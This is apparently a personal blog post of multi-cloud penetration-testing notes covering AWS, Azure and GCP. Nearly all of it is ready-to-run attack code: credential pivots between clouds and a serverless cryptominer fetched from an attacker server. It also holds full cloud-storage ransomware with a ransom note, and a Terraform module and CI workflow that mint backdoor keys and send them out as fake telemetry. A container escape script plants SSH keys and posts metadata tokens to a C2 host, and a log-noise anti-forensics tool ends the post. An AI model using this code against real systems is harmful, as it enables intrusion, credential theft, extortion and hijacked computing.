Skip to main content

Cloud VAPT Notes (Multi-Cloud)

2837 words
Edwin Tok | Shiro
Author
Edwin Tok | Shiro
「 ✦ OwO ✦ 」
Table of Contents

Cloud Pentesting (Multi-Cloud)
#


Multi-Cloud Attack Chains
#

Modern Cross-Cloud Scenarios:
#

# Scenario 1: AWS → Azure credential chain
# Service account key in AWS S3 bucket → Azure Storage → Entra ID access

# From AWS (assuming you've compromised AWS account):
aws s3 ls s3://company-secrets --recursive | grep -i "azure\|entra\|graph"
aws s3 cp s3://company-secrets/azure/service-principal.json . --profile compromised

# Use Azure credentials
az login --service-principal \
    --username $(jq -r '.appId' service-principal.json) \
    --password $(jq -r '.password' service-principal.json) \
    --tenant $(jq -r '.tenant' service-principal.json)

# Now pivot to Azure resources
az resource list --output table
# Scenario 2: GCP → AWS via Workload Identity Federation
# GCP service account → AWS role via OIDC federation

# From GCP:
gcloud iam service-accounts create aws-access-sa \
    --display-name="AWS Integration Service" \
    --project=PROJECT_ID

# Get GCP token
TOKEN=$(gcloud auth print-identity-token \
    --impersonate-service-account=aws-access-sa@PROJECT_ID.iam.gserviceaccount.com)

# Use token to assume AWS role (if federation configured)
aws sts assume-role-with-web-identity \
    --role-arn arn:aws:iam::ACCOUNT_ID:role/GCPFederatedRole \
    --role-session-name gcp-to-aws \
    --web-identity-token $TOKEN
# Scenario 3: GitHub Actions → Multi-Cloud
# Compromise GitHub Actions runner → Access AWS, Azure, GCP

# GitHub Actions workflow with multi-cloud access:
# .github/workflows/exploit.yml
name: Multi-Cloud Access
on: workflow_dispatch

jobs:
  multi-cloud:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
      - name: AWS Access
        uses: aws-actions/configure-aws-credentials@v2
        with:
          role-to-assume: arn:aws:iam::ACCOUNT:role/GitHubActionsRole
          aws-region: us-east-1
      
      - name: Azure Access
        uses: azure/login@v1
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
      
      - name: GCP Access
        uses: google-github-actions/auth@v1
        with:
          workload_identity_provider: 'projects/PROJECT_NUM/locations/global/workloadIdentityPools/POOL/providers/PROVIDER'
          service_account: 'sa@PROJECT.iam.gserviceaccount.com'
      
      - name: Exfiltrate
        run: |
          aws s3 ls > /tmp/aws-resources.txt
          az resource list > /tmp/azure-resources.txt
          gcloud projects list > /tmp/gcp-projects.txt
          curl -X POST https://attacker-c2.com/data -F "files=@/tmp/*.txt"

Federated Identity Exploitation:
#

# Modern organizations use identity federation extensively
# SAML, OIDC, OAuth 2.0 between cloud providers

# Common federation paths:
# 1. On-premises AD → Azure AD (Entra ID) → AWS/GCP
# 2. Okta → All clouds
# 3. Google Workspace → GCP → AWS (via federation)
# 4. GitHub → Cloud providers (via OIDC)

# Attack vector: Compromise federation provider
# Example: Compromise Okta → Access all federated clouds

# Check for federation in AWS:
aws iam list-saml-providers
aws iam get-saml-provider --saml-provider-arn arn:aws:iam::ACCOUNT:saml-provider/ProviderName

# Check federation in Azure:
Get-MgServicePrincipal | Where-Object {$_.ServicePrincipalType -eq "ManagedIdentity"}

# Check Workload Identity Federation in GCP:
gcloud iam workload-identity-pools list --location=global --project=PROJECT_ID

Advanced Persistence Techniques (Cross-Cloud)
#

Cloud-Native Malware:
#

# Serverless cryptominer (works across clouds with slight modifications)
# AWS Lambda / Azure Function / GCP Cloud Function

import subprocess
import urllib.request
import json
import os

def handler(event, context):
    """
    Serverless cryptominer - executes mining in cloud function
    Adapts to AWS Lambda, Azure Functions, or GCP Cloud Functions
    """
    
    # Detect cloud provider
    if 'AWS_LAMBDA_FUNCTION_NAME' in os.environ:
        cloud = 'aws'
    elif 'WEBSITE_SITE_NAME' in os.environ:
        cloud = 'azure'
    elif 'FUNCTION_NAME' in os.environ:
        cloud = 'gcp'
    else:
        cloud = 'unknown'
    
    # Download miner binary
    miner_url = "https://attacker-server.com/miner"
    miner_path = "/tmp/miner"
    
    try:
        urllib.request.urlretrieve(miner_url, miner_path)
        os.chmod(miner_path, 0o755)
        
        # Run miner (limited by function timeout - usually 15 mins max)
        pool = "pool.attacker.com:4444"
        wallet = "attacker-wallet-address"
        
        # Background process (won't block function return)
        subprocess.Popen([
            miner_path,
            "--pool", pool,
            "--wallet", wallet,
            "--cloud", cloud
        ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        
        # Return success (function continues mining until timeout)
        return {
            'statusCode': 200,
            'body': json.dumps({'status': 'success', 'cloud': cloud})
        }
    
    except Exception as e:
        return {
            'statusCode': 500,
            'body': json.dumps({'error': str(e)})
        }

# Deploy across multiple clouds for distributed mining
# Cost: Minimal (functions billed per execution)
# Detection: Difficult (appears as legitimate function execution)

Cloud Storage Ransomware (Cross-Cloud):
#

# Storage encryption script (AWS S3 / Azure Blob / GCP GCS)
import boto3  # AWS
from azure.storage.blob import BlobServiceClient  # Azure
from google.cloud import storage  # GCP
from cryptography.fernet import Fernet
import os

class CloudStorageRansomware:
    def __init__(self, cloud_provider):
        self.provider = cloud_provider
        self.encryption_key = Fernet.generate_key()
        self.fernet = Fernet(self.encryption_key)
    
    def encrypt_aws_bucket(self, bucket_name):
        """Encrypt all objects in AWS S3 bucket"""
        s3 = boto3.client('s3')
        
        # List all objects
        response = s3.list_objects_v2(Bucket=bucket_name)
        
        for obj in response.get('Contents', []):
            key = obj['Key']
            
            # Download object
            response = s3.get_object(Bucket=bucket_name, Key=key)
            data = response['Body'].read()
            
            # Encrypt
            encrypted_data = self.fernet.encrypt(data)
            
            # Upload encrypted version
            s3.put_object(
                Bucket=bucket_name,
                Key=f"{key}.encrypted",
                Body=encrypted_data
            )
            
            # Delete original
            s3.delete_object(Bucket=bucket_name, Key=key)
        
        # Drop ransom note
        ransom_note = f"Your files encrypted. Send 1 BTC to recover. Key: {self.encryption_key.decode()}"
        s3.put_object(
            Bucket=bucket_name,
            Key='README_RANSOM.txt',
            Body=ransom_note
        )
    
    def encrypt_azure_container(self, connection_string, container_name):
        """Encrypt all blobs in Azure Storage container"""
        blob_service = BlobServiceClient.from_connection_string(connection_string)
        container_client = blob_service.get_container_client(container_name)
        # List all blobs
        blob_list = container_client.list_blobs()
        
        for blob in blob_list:
            blob_client = container_client.get_blob_client(blob.name)
            
            # Download blob
            data = blob_client.download_blob().readall()
            
            # Encrypt
            encrypted_data = self.fernet.encrypt(data)
            
            # Upload encrypted version
            encrypted_blob_client = container_client.get_blob_client(f"{blob.name}.encrypted")
            encrypted_blob_client.upload_blob(encrypted_data, overwrite=True)
            
            # Delete original
            blob_client.delete_blob()
        
        # Drop ransom note
        ransom_note = f"Your files encrypted. Send 1 BTC to recover. Key: {self.encryption_key.decode()}"
        ransom_blob = container_client.get_blob_client('README_RANSOM.txt')
        ransom_blob.upload_blob(ransom_note, overwrite=True)
    
    def encrypt_gcp_bucket(self, bucket_name):
        """Encrypt all objects in GCP Cloud Storage bucket"""
        client = storage.Client()
        bucket = client.bucket(bucket_name)
        
        # List all blobs
        blobs = bucket.list_blobs()
        
        for blob in blobs:
            # Download blob
            data = blob.download_as_bytes()
            
            # Encrypt
            encrypted_data = self.fernet.encrypt(data)
            
            # Upload encrypted version
            encrypted_blob = bucket.blob(f"{blob.name}.encrypted")
            encrypted_blob.upload_from_string(encrypted_data)
            
            # Delete original
            blob.delete()
        
        # Drop ransom note
        ransom_note = f"Your files encrypted. Send 1 BTC to recover. Key: {self.encryption_key.decode()}"
        ransom_blob = bucket.blob('README_RANSOM.txt')
        ransom_blob.upload_from_string(ransom_note)

# OPSEC: Storage-level encryption bypasses many ransomware defections
# Detection: Bulk object deletion/creation may trigger alerts
# Prevention: Versioning, immutable storage, backup isolation

Supply Chain Attacks
#

Infrastructure-as-Code Poisoning:
#

# Malicious Terraform module (works across AWS, Azure, GCP)
# File: malicious-module/main.tf

# Appears to create legitimate backup infrastructure
# Actually creates backdoor access

terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~> 5.0"
    }
    azurerm = {
      source  = "hashicorp/azurerm"
      version = "~> 3.0"
    }
    google = {
      source  = "hashicorp/google"
      version = "~> 5.0"
    }
  }
}

# AWS Backdoor
resource "aws_iam_user" "backdoor" {
  count = var.cloud_provider == "aws" ? 1 : 0
  name  = "backup-service-account"
  
  tags = {
    Purpose     = "Automated Backups"
    ManagedBy   = "Terraform"
    Department  = "Infrastructure"
  }
}

resource "aws_iam_access_key" "backdoor_key" {
  count = var.cloud_provider == "aws" ? 1 : 0
  user  = aws_iam_user.backdoor[0].name
}

resource "aws_iam_user_policy_attachment" "backdoor_policy" {
  count      = var.cloud_provider == "aws" ? 1 : 0
  user       = aws_iam_user.backdoor[0].name
  policy_arn = "arn:aws:iam::aws:policy/PowerUserAccess"
}

# Exfiltrate credentials via HTTP request (looks like telemetry)
resource "null_resource" "telemetry" {
  count = var.cloud_provider == "aws" ? 1 : 0
  
  provisioner "local-exec" {
    command = <<-EOT
      curl -X POST https://telemetry.example.com/metrics \
        -H "Content-Type: application/json" \
        -d '{
          "module": "backup-infrastructure",
          "version": "1.2.3",
          "provider": "aws",
          "access_key": "${aws_iam_access_key.backdoor_key[0].id}",
          "secret_key": "${aws_iam_access_key.backdoor_key[0].secret}"
        }'
    EOT
  }
}

# Azure Backdoor
resource "azurerm_service_principal" "backdoor" {
  count          = var.cloud_provider == "azure" ? 1 : 0
  application_id = azurerm_application.backdoor[0].application_id
}

resource "azurerm_application" "backdoor" {
  count        = var.cloud_provider == "azure" ? 1 : 0
  display_name = "Backup Automation Service"
}

resource "azurerm_application_password" "backdoor_secret" {
  count          = var.cloud_provider == "azure" ? 1 : 0
  application_id = azurerm_application.backdoor[0].id
  display_name   = "Terraform Managed"
  end_date       = "2034-01-01T00:00:00Z"
}

resource "azurerm_role_assignment" "backdoor_role" {
  count                = var.cloud_provider == "azure" ? 1 : 0
  scope                = data.azurerm_subscription.current.id
  role_definition_name = "Contributor"
  principal_id         = azurerm_service_principal.backdoor[0].object_id
}

# GCP Backdoor
resource "google_service_account" "backdoor" {
  count        = var.cloud_provider == "gcp" ? 1 : 0
  account_id   = "backup-automation"
  display_name = "Backup Automation Service Account"
  project      = var.project_id
}

resource "google_service_account_key" "backdoor_key" {
  count              = var.cloud_provider == "gcp" ? 1 : 0
  service_account_id = google_service_account.backdoor[0].name
}

resource "google_project_iam_member" "backdoor_role" {
  count   = var.cloud_provider == "gcp" ? 1 : 0
  project = var.project_id
  role    = "roles/editor"
  member  = "serviceAccount:${google_service_account.backdoor[0].email}"
}

# Outputs (appear helpful but expose credentials)
output "backup_credentials" {
  description = "Backup service credentials (store securely)"
  sensitive   = true
  value = var.cloud_provider == "aws" ? {
    access_key = aws_iam_access_key.backdoor_key[0].id
    secret_key = aws_iam_access_key.backdoor_key[0].secret
  } : var.cloud_provider == "azure" ? {
    client_id     = azurerm_application.backdoor[0].application_id
    client_secret = azurerm_application_password.backdoor_secret[0].value
    tenant_id     = data.azurerm_client_config.current.tenant_id
  } : {
    service_account_key = base64decode(google_service_account_key.backdoor_key[0].private_key)
  }
}

# OPSEC: Module appears legitimate (backup infrastructure)
# Tags and descriptions make resources look operational
# Outputs marked as sensitive (less visible in logs)
# Telemetry exfiltration disguised as normal metrics collection

CI/CD Pipeline Compromise (Multi-Cloud):
#

# GitHub Actions workflow - appears to deploy infrastructure
# Actually exfiltrates credentials across all clouds
# File: .github/workflows/deploy-infrastructure.yml

name: Deploy Multi-Cloud Infrastructure
on:
  push:
    branches: [main]
  workflow_dispatch:

jobs:
  deploy:
    runs-on: ubuntu-latest
    permissions:
      id-token: write  # OIDC federation
      contents: read
    
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      
      # AWS Access
      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v2
        with:
          role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
          aws-region: us-east-1
      
      # Azure Access
      - name: Azure login
        uses: azure/login@v1
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
      
      # GCP Access
      - name: Authenticate to GCP
        uses: google-github-actions/auth@v1
        with:
          workload_identity_provider: ${{ secrets.GCP_WORKLOAD_IDENTITY_PROVIDER }}
          service_account: ${{ secrets.GCP_SERVICE_ACCOUNT }}
      
      # "Infrastructure deployment" - actually credential exfiltration
      - name: Deploy infrastructure
        run: |
          # Collect AWS credentials
          AWS_CREDS=$(aws sts get-caller-identity)
          AWS_ACCOUNT=$(echo $AWS_CREDS | jq -r '.Account')
          AWS_ROLE=$(echo $AWS_CREDS | jq -r '.Arn')
          AWS_TOKEN=$(aws configure get aws_session_token)
          
          # Collect Azure credentials
          AZURE_TOKEN=$(az account get-access-token --query accessToken -o tsv)
          AZURE_SUB=$(az account show --query id -o tsv)
          
          # Collect GCP credentials
          GCP_TOKEN=$(gcloud auth print-access-token)
          GCP_PROJECT=$(gcloud config get-value project)
          
          # "Deployment metrics" - actually exfiltration
          curl -X POST https://deployment-analytics.example.com/metrics \
            -H "Content-Type: application/json" \
            -H "X-Workflow-Run: ${{ github.run_id }}" \
            -d @- <<EOF
          {
            "repository": "${{ github.repository }}",
            "workflow": "${{ github.workflow }}",
            "timestamp": "$(date -u +%Y-%m-%dT%H:%M:%SZ)",
            "credentials": {
              "aws": {
                "account": "$AWS_ACCOUNT",
                "role": "$AWS_ROLE",
                "token": "$AWS_TOKEN"
              },
              "azure": {
                "subscription": "$AZURE_SUB",
                "token": "$AZURE_TOKEN"
              },
              "gcp": {
                "project": "$GCP_PROJECT",
                "token": "$GCP_TOKEN"
              }
            }
          }
          EOF
          
          # Actual deployment (minimal, to maintain cover)
          echo "Infrastructure deployed successfully"
      
      - name: Post-deployment validation
        run: |
          echo "Validation complete"
          # Further exfiltration could happen here

# OPSEC: Workflow appears legitimate (infrastructure deployment)
# Uses recommended authentication methods (OIDC, Workload Identity)
# Exfiltration disguised as analytics/telemetry
# Minimal actual deployment maintains operational cover

Container Security (Cross-Cloud)
#

Container Escape Techniques (Universal):
#

#!/bin/bash
# Container escape script - works on AWS ECS, Azure ACI, GKE
# Detects environment and adapts escape technique

echo "[*] Container Escape Utility"

# Detect container runtime
if [ -f /.dockerenv ]; then
    RUNTIME="docker"
elif grep -q "containerd" /proc/1/cgroup 2>/dev/null; then
    RUNTIME="containerd"
elif grep -q "crio" /proc/1/cgroup 2>/dev/null; then
    RUNTIME="crio"
else
    RUNTIME="unknown"
fi

echo "[+] Detected runtime: $RUNTIME"

# Method 1: Check for privileged container
if [ -w /dev/sda ] || [ -w /dev/xvda ] || [ -w /dev/nvme0n1 ]; then
    echo "[!] Privileged container detected"
    echo "[+] Attempting host filesystem mount"
    
    # Mount host filesystem
    mkdir -p /mnt/host
    mount /dev/sda1 /mnt/host 2>/dev/null || \
    mount /dev/xvda1 /mnt/host 2>/dev/null || \
    mount /dev/nvme0n1p1 /mnt/host 2>/dev/null
    
    if [ $? -eq 0 ]; then
        echo "[+] Host filesystem mounted at /mnt/host"
        
        # Check for cloud metadata service from host context
        chroot /mnt/host /bin/bash -c "curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token 2>/dev/null" && \
            echo "[+] GCP metadata service accessible from host"
        
        chroot /mnt/host /bin/bash -c "curl -H 'Metadata:true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/ 2>/dev/null" && \
            echo "[+] Azure metadata service accessible from host"
        
        chroot /mnt/host /bin/bash -c "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null" && \
            echo "[+] AWS metadata service accessible from host"
        
        # Add SSH key to host
        if [ -f /mnt/host/root/.ssh/authorized_keys ]; then
            echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ... attacker@kali" >> /mnt/host/root/.ssh/authorized_keys
            echo "[+] SSH key added to host"
        fi
    fi
fi

# Method 2: Docker socket escape
if [ -S /var/run/docker.sock ]; then
    echo "[!] Docker socket mounted - attempting escape"
    
    # Check if docker client available
    if command -v docker &>/dev/null; then
        # Create privileged container with host filesystem mounted
        docker run -d --privileged --pid=host --net=host \
            -v /:/host \
            alpine:latest \
            /bin/sh -c "chroot /host /bin/bash"
        
        echo "[+] Privileged escape container created"
    fi
fi

# Method 3: Kubernetes service account abuse
if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
    echo "[!] Kubernetes service account detected"
    
    K8S_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
    K8S_API="https://kubernetes.default.svc"
    
    # Try to list pods
    curl -k -H "Authorization: Bearer $K8S_TOKEN" \
        "$K8S_API/api/v1/namespaces/default/pods" 2>/dev/null | grep -q "items" && \
        echo "[+] Kubernetes API accessible"
    
    # Attempt to create privileged pod
    cat > /tmp/escape-pod.json <<EOF
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {"name": "escape-pod"},
  "spec": {
    "hostPID": true,
    "hostNetwork": true,
    "containers": [{
      "name": "escape",
      "image": "alpine:latest",
      "command": ["/bin/sh"],
      "stdin": true,
      "tty": true,
      "securityContext": {"privileged": true},
      "volumeMounts": [{"mountPath": "/host", "name": "host-root"}]
    }],
    "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}]
  }
}
EOF
    
    curl -k -X POST \
        -H "Authorization: Bearer $K8S_TOKEN" \
        -H "Content-Type: application/json" \
        -d @/tmp/escape-pod.json \
        "$K8S_API/api/v1/namespaces/default/pods" 2>/dev/null && \
        echo "[+] Escape pod created"
fi

# Method 4: Capability abuse (CAP_SYS_ADMIN)
if capsh --print 2>/dev/null | grep -q "cap_sys_admin"; then
    echo "[!] CAP_SYS_ADMIN capability detected"
    
    # Create new namespace and mount host filesystem
    unshare -m /bin/bash -c "
        mount --bind / /mnt
        echo '[+] Host filesystem accessible via namespace manipulation'
    "
fi

# Method 5: Cloud-specific metadata access
echo "[+] Checking cloud metadata services"

# Try GCP
GCP_TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" 2>/dev/null | \
    jq -r '.access_token')

if [ ! -z "$GCP_TOKEN" ] && [ "$GCP_TOKEN" != "null" ]; then
    echo "[+] GCP metadata service accessible"
    echo "[+] Token: ${GCP_TOKEN:0:50}..."
    
    # Exfiltrate token
    curl -X POST https://attacker-c2.com/gcp-token \
        -H "Content-Type: application/json" \
        -d "{\"token\":\"$GCP_TOKEN\"}" 2>/dev/null
fi

# Try Azure
AZURE_TOKEN=$(curl -s -H "Metadata:true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" 2>/dev/null | \
    jq -r '.access_token')

if [ ! -z "$AZURE_TOKEN" ] && [ "$AZURE_TOKEN" != "null" ]; then
    echo "[+] Azure metadata service accessible"
    echo "[+] Token: ${AZURE_TOKEN:0:50}..."
    
    # Exfiltrate token
    curl -X POST https://attacker-c2.com/azure-token \
        -H "Content-Type: application/json" \
        -d "{\"token\":\"$AZURE_TOKEN\"}" 2>/dev/null
fi

# Try AWS
AWS_ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null)
if [ ! -z "$AWS_ROLE" ]; then
    AWS_CREDS=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$AWS_ROLE 2>/dev/null)
    
    if [ ! -z "$AWS_CREDS" ]; then
        echo "[+] AWS metadata service accessible"
        echo "[+] Role: $AWS_ROLE"
        
        # Exfiltrate credentials
        curl -X POST https://attacker-c2.com/aws-creds \
            -H "Content-Type: application/json" \
            -d "$AWS_CREDS" 2>/dev/null
    fi
fi

echo "[*] Escape attempt complete"

Incident Response Evasion
#

Anti-Forensics Across Clouds:
#

#!/usr/bin/env python3
"""
Multi-Cloud Anti-Forensics Tool
Attempts to erase/obfuscate tracks across AWS, Azure, GCP
USE FOR AUTHORIZED TESTING ONLY
"""

import boto3  # AWS
from azure.mgmt.monitor import MonitorManagementClient  # Azure
from azure.identity import DefaultAzureCredential
from google.cloud import logging_v2  # GCP
import time
import random

class MultiCloudAntiForensics:
    def __init__(self):
        self.aws_session = None
        self.azure_credential = None
        self.gcp_client = None
    
    def setup_aws(self, profile=None):
        """Setup AWS session"""
        self.aws_session = boto3.Session(profile_name=profile)
        print("[+] AWS session established")
    
    def setup_azure(self):
        """Setup Azure credentials"""
        self.azure_credential = DefaultAzureCredential()
        print("[+] Azure credentials established")
    
    def setup_gcp(self, project_id):
        """Setup GCP client"""
        self.gcp_client = logging_v2.Client(project=project_id)
        print("[+] GCP client established")
    
    def create_noise_aws(self, num_events=1000):
        """Generate noise in AWS CloudTrail logs"""
        print(f"[*] Generating {num_events} noise events in AWS")
        
        ec2 = self.aws_session.client('ec2')
        s3 = self.aws_session.client('s3')
        
        for i in range(num_events):
            try:
                # Random benign API calls
                choice = random.randint(1, 5)
                
                if choice == 1:
                    ec2.describe_instances(MaxResults=5)
                elif choice == 2:
                    s3.list_buckets()
                elif choice == 3:
                    ec2.describe_security_groups(MaxResults=5)
                elif choice == 4:
                    ec2.describe_vpcs(MaxResults=5)
                else:
                    s3.list_buckets()
                
                # Random delay to appear natural
                time.sleep(random.uniform(0.1, 2.0))
                
                if (i + 1) % 100 == 0:
                    print(f"[+] Generated {i + 1} noise events")
            
            except Exception as e:
                # Silently continue on errors
                pass
        
        print(f"[+] AWS noise generation complete")
    
    def create_noise_azure(self, subscription_id, num_events=1000):
        """Generate noise in Azure Activity Logs"""
        print(f"[*] Generating {num_events} noise events in Azure")
        
        from azure.mgmt.resource import ResourceManagementClient
        from azure.mgmt.compute import ComputeManagementClient
        
        resource_client = ResourceManagementClient(self.azure_credential, subscription_id)
        compute_client = ComputeManagementClient(self.azure_credential, subscription_id)
        
        for i in range(num_events):
            try:
                choice = random.randint(1, 3)
                
                if choice == 1:
                    list(resource_client.resource_groups.list())
                elif choice == 2:
                    list(compute_client.virtual_machines.list_all())
                else:
                    list(resource_client.resources.list())
                
                time.sleep(random.uniform(0.1, 2.0))
                
                if (i + 1) % 100 == 0:
                    print(f"[+] Generated {i + 1} noise events")
            
            except Exception as e:
                pass
        
        print(f"[+] Azure noise generation complete")
    
    def create_noise_gcp(self, project_id, num_events=1000):
        """Generate noise in GCP Cloud Audit Logs"""
        print(f"[*] Generating {num_events} noise events in GCP")
        
        from google.cloud import compute_v1
        from google.cloud import storage
        
        instances_client = compute_v1.InstancesClient()
        storage_client = storage.Client()
        
        for i in range(num_events):
            try:
                choice = random.randint(1, 3)
                
                if choice == 1:
                    # List instances in random zone
                    zones = ['us-central1-a', 'us-east1-b', 'europe-west1-c']
                    zone = random.choice(zones)
                    request = compute_v1.ListInstancesRequest(project=project_id, zone=zone)
                    list(instances_client.list(request=request))
                
                elif choice == 2:
                    # List storage buckets
                    list(storage_client.list_buckets())
                
                else:
                    # List instances again (common operation)
                    zones = ['us-central1-a', 'us-east1-b']
                    zone = random.choice(zones)
                    request = compute_v1.ListInstancesRequest(project=project_id, zone=zone)
                    list(instances_client.list(request=request))
                
                time.sleep(random.uniform(0.1, 2.0))
                
                if (i + 1) % 100 == 0:
                    print(f"[+] Generated {i + 1} noise events")
            
            except Exception as e:
                pass
        
        print(f"[+] GCP noise generation complete")
    
    def timestamp_manipulation(self, cloud_provider):
        """Attempt to manipulate timestamps (where possible)"""
        print(f"[*] Attempting timestamp manipulation on {cloud_provider}")
        
        if cloud_provider == 'aws':
            # AWS: Modify S3 object timestamps via copy
            s3 = self.aws_session.client('s3')
            
            try:
                # Example: Backdate object by copying with modified metadata
                # Note: This doesn't change CloudTrail logs, only object metadata
                print("[!] AWS object timestamps can be modified via metadata")
                print("[!] However, CloudTrail logs are immutable")
            except Exception as e:
                print(f"[-] Timestamp manipulation failed: {e}")
        
        elif cloud_provider == 'azure':
            print("[!] Azure Activity Logs are immutable")
            print("[!] Timestamp manipulation not possible")
        
        elif cloud_provider == 'gcp':
            print("[!] GCP Cloud Audit Logs are immutable")
            print("[!] Timestamp manipulation not possible")

# Usage example (AUTHORIZED TESTING ONLY)
if __name__ == "__main__":
    print("[*] Multi-Cloud Anti-Forensics Tool")
    print("[!] USE FOR AUTHORIZED TESTING ONLY")
    print("")
    
    af = MultiCloudAntiForensics()
    
    # Generate noise to obscure malicious activity
    # This makes finding specific malicious events harder in SIEM
    
    # AWS noise
    af.setup_aws(profile='red-team')
    af.create_noise_aws(num_events=500)
    
    # Azure noise
    # af.setup_azure()
    # af.create_noise_azure(subscription_id='sub-id', num_events=500)
    
    # GCP noise
    # af.setup_gcp(project_id='project-id')
    # af.create_noise_gcp(project_id='project-id', num_events=500)
    
    print("[*] Anti-forensics operations complete")
    print("[!] Remember: Logs are immutable in cloud environments")
    print("[!] Focus on evasion, not erasure")